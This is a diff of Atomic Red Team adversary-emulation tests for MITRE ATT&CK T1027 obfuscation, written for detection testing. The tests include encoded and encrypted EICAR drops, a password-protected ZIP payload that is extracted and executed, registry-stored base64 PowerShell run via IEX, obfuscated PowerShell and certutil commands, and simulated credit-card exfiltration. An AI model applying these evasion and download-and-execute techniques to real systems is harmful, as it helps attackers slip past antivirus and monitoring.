-## Atomic Test #1 - Decode Eicar File and Write to File
 Decode the eicar value, and write it to file, for AV/EDR to try to catch.

 **Supported Platforms:** Windows, macOS, Linux

+**auto_generated_guid:** `7693ccaa-8d64-4043-92a5-a2eb70359535`

-**auto_generated_guid:** 7693ccaa-8d64-4043-92a5-a2eb70359535
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 $encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
 $bytes = [System.Convert]::FromBase64String($encodedString)
 $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
-
 #write the decoded eicar string to file
 $decodedString | Out-File T1027.013_decodedEicar.txt
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Just delete the resulting T1027.013_decodedEicar.txt file.
 ```
+### Atomic Test #2: Decrypt Eicar File and Write to File

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Decrypt Eicar File and Write to File
 Decrypt the eicar value, and write it to file, for AV/EDR to try to catch.

 **Supported Platforms:** Windows, macOS, Linux

+**auto_generated_guid:** `b404caaa-12ce-43c7-9214-62a531c044f7`

-**auto_generated_guid:** b404caaa-12ce-43c7-9214-62a531c044f7
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 $encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
 $key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
-
 $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
 $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
-
 #Write the decrypted eicar string to a file
 $decryptedString | out-file T1027.013_decryptedEicar.txt
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Just delete the resulting T1027.013_decryptedEicar.txt file.
 ```
+### Atomic Test #3: Password-Protected ZIP Payload Extraction and Execution

+Extracts and executes a script from a password-protected ZIP archive.
+This technique is commonly used by malware families like Emotet and QBot to deliver payloads
+via email attachments where the password is provided in the message body.
+The encrypted ZIP evades static file analysis until extracted at runtime.
+Upon successful execution, displays confirmation and system information.

+**Supported Platforms:** Linux, macOS

+**auto_generated_guid:** `c2ca068a-eb1e-498f-9f93-3d554c455916`

+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| zip_password | Password used to protect the ZIP archive | String | infected|
+
+#### Attack Commands: Run with `bash`!
+
+```bash
+echo '#!/bin/bash' > /tmp/art_payload.sh
+echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
+echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
+echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
+echo 'uname -a' >> /tmp/art_payload.sh
+cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
+rm /tmp/art_payload.sh
+echo "Encrypted ZIP created. Extracting with password..."
+unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
+echo "Executing extracted payload:"
+bash /tmp/art_payload.sh
+```
+
+#### Cleanup Commands
+
+```bash
+rm -f /tmp/art_payload.sh
+rm -f /tmp/art_encrypted.zip
+```
+
+#### Dependencies: Run with `bash`!
+
+##### Description: zip and unzip must be installed
+
+###### Check Prereq Commands
+
+```bash
+which zip && which unzip
+```
+
+###### Get Prereq Commands
+
+```bash
+echo "Install zip and unzip using your package manager (apt-get, yum, or brew)"
+```

-<br/>
@@ -13,7 +13,6 @@ atomic_tests:
      $encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
      $bytes = [System.Convert]::FromBase64String($encodedString)
      $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
-
      #write the decoded eicar string to file
      $decodedString | Out-File T1027.013_decodedEicar.txt
    cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
@@ -30,12 +29,51 @@ atomic_tests:
    command: |-
      $encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
      $key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
-
      $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
      $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
-
      #Write the decrypted eicar string to a file
      $decryptedString | out-file T1027.013_decryptedEicar.txt
    cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
    name: powershell
    elevation_required: false
+- name: Password-Protected ZIP Payload Extraction and Execution
+  auto_generated_guid: c2ca068a-eb1e-498f-9f93-3d554c455916
+  description: |
+    Extracts and executes a script from a password-protected ZIP archive.
+    This technique is commonly used by malware families like Emotet and QBot to deliver payloads
+    via email attachments where the password is provided in the message body.
+    The encrypted ZIP evades static file analysis until extracted at runtime.
+    Upon successful execution, displays confirmation and system information.
+  supported_platforms:
+  - linux
+  - macos
+  input_arguments:
+    zip_password:
+      description: Password used to protect the ZIP archive
+      type: String
+      default: infected
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      zip and unzip must be installed
+    prereq_command: |
+      which zip && which unzip
+    get_prereq_command: |
+      echo "Install zip and unzip using your package manager (apt-get, yum, or brew)"
+  executor:
+    command: |
+      echo '#!/bin/bash' > /tmp/art_payload.sh
+      echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
+      echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
+      echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
+      echo 'uname -a' >> /tmp/art_payload.sh
+      cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
+      rm /tmp/art_payload.sh
+      echo "Encrypted ZIP created. Extracting with password..."
+      unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
+      echo "Executing extracted payload:"
+      bash /tmp/art_payload.sh
+    cleanup_command: |
+      rm -f /tmp/art_payload.sh
+      rm -f /tmp/art_encrypted.zip
+    name: bash
@@ -1,43 +1,33 @@
 # T1027 - Obfuscated Files or Information
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027)
-<blockquote>

-Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. 
+## Description from ATT&CK

-Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. 
+> Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
+> 
+> Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript.
+> 
+> Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)
+> 
+> Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)

-Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)
-
-Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) 
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1027)

 ## Atomic Tests

- [Atomic Test #1 - Decode base64 Data into Script](#atomic-test-1---decode-base64-data-into-script)
+- [Atomic Test #1: Decode base64 Data into Script](#atomic-test-1-decode-base64-data-into-script)
+- [Atomic Test #2: Execute base64-encoded PowerShell](#atomic-test-2-execute-base64-encoded-powershell)
+- [Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry](#atomic-test-3-execute-base64-encoded-powershell-from-windows-registry)
+- [Atomic Test #4: Execution from Compressed File](#atomic-test-4-execution-from-compressed-file)
+- [Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email](#atomic-test-5-dlp-evasion-via-sensitive-data-in-vba-macro-over-email)
+- [Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP](#atomic-test-6-dlp-evasion-via-sensitive-data-in-vba-macro-over-http)
+- [Atomic Test #7: Obfuscated Command in PowerShell](#atomic-test-7-obfuscated-command-in-powershell)
+- [Atomic Test #8: Obfuscated Command Line using special Unicode characters](#atomic-test-8-obfuscated-command-line-using-special-unicode-characters)
+- [Atomic Test #9: Snake Malware Encrypted crmlog file](#atomic-test-9-snake-malware-encrypted-crmlog-file)
+- [Atomic Test #10: Execution from Compressed JScript File](#atomic-test-10-execution-from-compressed-jscript-file)
+- [Atomic Test #11: Obfuscated PowerShell Command via Character Array](#atomic-test-11-obfuscated-powershell-command-via-character-array)

- [Atomic Test #2 - Execute base64-encoded PowerShell](#atomic-test-2---execute-base64-encoded-powershell)
+### Atomic Test #1: Decode base64 Data into Script

- [Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry](#atomic-test-3---execute-base64-encoded-powershell-from-windows-registry)
-
- [Atomic Test #4 - Execution from Compressed File](#atomic-test-4---execution-from-compressed-file)
-
- [Atomic Test #5 - DLP Evasion via Sensitive Data in VBA Macro over email](#atomic-test-5---dlp-evasion-via-sensitive-data-in-vba-macro-over-email)
-
- [Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP](#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http)
-
- [Atomic Test #7 - Obfuscated Command in PowerShell](#atomic-test-7---obfuscated-command-in-powershell)
-
- [Atomic Test #8 - Obfuscated Command Line using special Unicode characters](#atomic-test-8---obfuscated-command-line-using-special-unicode-characters)
-
- [Atomic Test #9 - Snake Malware Encrypted crmlog file](#atomic-test-9---snake-malware-encrypted-crmlog-file)
-
- [Atomic Test #10 - Execution from Compressed JScript File](#atomic-test-10---execution-from-compressed-jscript-file)
-
-
-<br/>
-
-## Atomic Test #1 - Decode base64 Data into Script
 Creates a base64-encoded data file and decodes it into an executable shell script

 Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that echoes `Hello from the Atomic Red Team` 
@@ -45,21 +35,15 @@ and uname -v

 **Supported Platforms:** macOS, Linux

+**auto_generated_guid:** `f45df6be-2e1e-4136-a384-8f18ab3826fb`

-**auto_generated_guid:** f45df6be-2e1e-4136-a384-8f18ab3826fb
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | shell_command | command to encode | string | echo Hello from the Atomic Red Team && uname -v|

-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64decode -r"; else cmd="base64 -d"; fi;
@@ -68,54 +52,47 @@ chmod +x /tmp/art.sh
 /tmp/art.sh
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm /tmp/encoded.dat 
 rm /tmp/art.sh
 ```

+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: encode the command into base64 file
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -e "/tmp/encoded.dat" ]; then exit 0; else exit 1; fi
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64encode -r -"; else cmd="base64"; fi;
 echo "#{shell_command}" | $cmd > /tmp/encoded.dat
 ```

+### Atomic Test #2: Execute base64-encoded PowerShell

-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Execute base64-encoded PowerShell
 Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.

 Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!"

 **Supported Platforms:** Windows

+**auto_generated_guid:** `a50d5a97-2531-499e-a1de-5544c74432c6`

-**auto_generated_guid:** a50d5a97-2531-499e-a1de-5544c74432c6
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | powershell_command | PowerShell command to encode | string | Write-Host "Hey, Atomic!"|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 $OriginalCommand = '#{powershell_command}'
@@ -125,38 +102,25 @@ $EncodedCommand
 powershell.exe -EncodedCommand $EncodedCommand
 ```

+### Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry
 Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools.

 Upon successful execution, powershell will execute encoded command and read/write from the registry.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `450e7218-7915-4be4-8b9b-464a49eafcec`

-**auto_generated_guid:** 450e7218-7915-4be4-8b9b-464a49eafcec
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | registry_key_storage | Windows Registry Key to store code | string | HKCU:Software&#92;Microsoft&#92;Windows&#92;CurrentVersion|
 | powershell_command | PowerShell command to encode | string | Write-Host "Hey, Atomic!"|
 | registry_entry_storage | Windows Registry entry to store code under key | string | Debug|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 $OriginalCommand = '#{powershell_command}'
@@ -168,58 +132,50 @@ Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_sto
 powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage}
 ```
+### Atomic Test #4: Execution from Compressed File

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Execution from Compressed File
 Mimic execution of compressed executable. When successfully executed, calculator.exe will open.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `f8c8a909-5f29-49ac-9244-413936ce6d1f`

-**auto_generated_guid:** f8c8a909-5f29-49ac-9244-413936ce6d1f
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url_path | url to download Exe | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 taskkill /f /im calculator.exe >nul 2>nul
 taskkill /f /im CalculatorApp.exe >nul 2>nul
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: T1027.exe must exist on disk at PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
@@ -227,26 +183,17 @@ Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayload
 Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\" -Force
 ```

+### Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email

-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - DLP Evasion via Sensitive Data in VBA Macro over email
 Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email.
 Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `129edb75-d7b8-42cd-a8ba-1f3db64ec4ad`

-**auto_generated_guid:** 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path of the XLSM file | path | PathToAtomicsFolder&#92;T1027&#92;src&#92;T1027-cc-macro.xlsm|
@@ -254,106 +201,66 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
 | receiver | receiver email | string | test@corp.com|
 | smtp_server | SMTP Server IP Address | string | 127.0.0.1|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments "#{input_file}" -SmtpServer #{smtp_server}
 ```

+### Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP
 Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP.
 Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `e2d85e66-cb66-4ed7-93b1-833fc56c9319`

-**auto_generated_guid:** e2d85e66-cb66-4ed7-93b1-833fc56c9319
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path of the XLSM file | path | PathToAtomicsFolder&#92;T1027&#92;src&#92;T1027-cc-macro.xlsm|
 | ip_address | Destination IP address | string | 127.0.0.1|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 Invoke-WebRequest -Uri #{ip_address} -Method POST -Body "#{input_file}"
 ```

+### Atomic Test #7: Obfuscated Command in PowerShell

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Obfuscated Command in PowerShell
 This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `8b3f4ed6-077b-4bdd-891c-2d237f19410f`

-**auto_generated_guid:** 8b3f4ed6-077b-4bdd-891c-2d237f19410f
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
 ```

+### Atomic Test #8: Obfuscated Command Line using special Unicode characters

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Obfuscated Command Line using special Unicode characters
 This is an obfuscated certutil command that when executed downloads a file from the web. Adapted from T1105. Obfuscation includes special options chars (unicode hyphens), character substitution (e.g. ᶠ) and character insertion (including the usage of the right-to-left 0x202E and left-to-right 0x202D override characters).
 Reference:
 https://wietze.github.io/blog/windows-command-line-obfuscation

 **Supported Platforms:** Windows

+**auto_generated_guid:** `e68b945c-52d0-4dd9-a5e8-d173d70c448f`

-**auto_generated_guid:** e68b945c-52d0-4dd9-a5e8-d173d70c448f
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_file | URL of file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
 | local_path | Local path/filename to save the downloaded file to | path | Atomic-license.txt|

-#### Run it with these steps! 
+#### Attack Commands: Run it with these steps! 
 1. Copy the following command into the command prompt after replacing #{remote_file} and #{local_path} with your desired URL and filename.


@@ -363,86 +270,64 @@ https://wietze.github.io/blog/windows-command-line-obfuscation
 2. Press enter to execute the command. You will find the file or webpage you specified saved to the file you specified in the command.


+### Atomic Test #9: Snake Malware Encrypted crmlog file

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Snake Malware Encrypted crmlog file
 The following Atomic Test will create a file with a specific name and sets its attributes to Hidden, System, and Archive. This was related to the Snake Malware campaign and is later decrypted by Snake's kernel driver.
 [Snake Malware - CISA](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF)

 **Supported Platforms:** Windows

+**auto_generated_guid:** `7e47ee60-9dd1-4269-9c4f-97953b183268`

-**auto_generated_guid:** 7e47ee60-9dd1-4269-9c4f-97953b183268
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 $file = New-Item $env:windir\registration\04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog; $file.Attributes = 'Hidden', 'System', 'Archive'; Write-Host "File created: $($file.FullName)"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 $fileNameToDelete = '04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog'; $filePathToDelete = "$env:windir\registration\"; $fullPathToDelete = Join-Path $filePathToDelete $fileNameToDelete; if (Test-Path $fullPathToDelete) { Remove-Item -Path $fullPathToDelete -Force; Write-Host "File deleted: $fullPathToDelete" } else { Write-Host "File not found: $fullPathToDelete" }
 ```
+### Atomic Test #10: Execution from Compressed JScript File

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #10 - Execution from Compressed JScript File
 Mimic execution of compressed JavaScript file. When successfully executed, calculator.exe will open. This test is meant to help emulate Gootloader as per https://redcanary.com/blog/gootloader/

 **Supported Platforms:** Windows

+**auto_generated_guid:** `fad04df1-5229-4185-b016-fb6010cd87ac`

-**auto_generated_guid:** fad04df1-5229-4185-b016-fb6010cd87ac
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url_path | url to download JScript file | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/t1027js.zip|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 taskkill /f /im calculator.exe >nul 2>nul
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: T1027.js must exist on disk at PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -450,7 +335,27 @@ Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayload
 Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\" -Force
 ```

+### Atomic Test #11: Obfuscated PowerShell Command via Character Array

+Spawns a child PowerShell process using character array obfuscation. 
+Both the PowerShell binary name and executed command are constructed 
+from ASCII values at runtime to evade string-based detection.

+**Supported Platforms:** Windows

-<br/>
+**auto_generated_guid:** `6683baf0-6e77-4f58-b114-814184ea8150`
+
+#### Attack Commands: Run with `powershell`!
+
+```powershell
+$ps = [char[]](112,111,119,101,114,115,104,101,108,108)
+$cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
+& (-join $ps) "-Command" (-join $cmd)
+```
+
+#### Cleanup Commands
+
+```powershell
+taskkill /f /im calculator.exe >nul 2>nul
+taskkill /f /im CalculatorApp.exe >nul 2>nul
+```
@@ -246,3 +246,21 @@ atomic_tests:
    cleanup_command: |
      taskkill /f /im calculator.exe >nul 2>nul
    name: command_prompt
+- name: Obfuscated PowerShell Command via Character Array
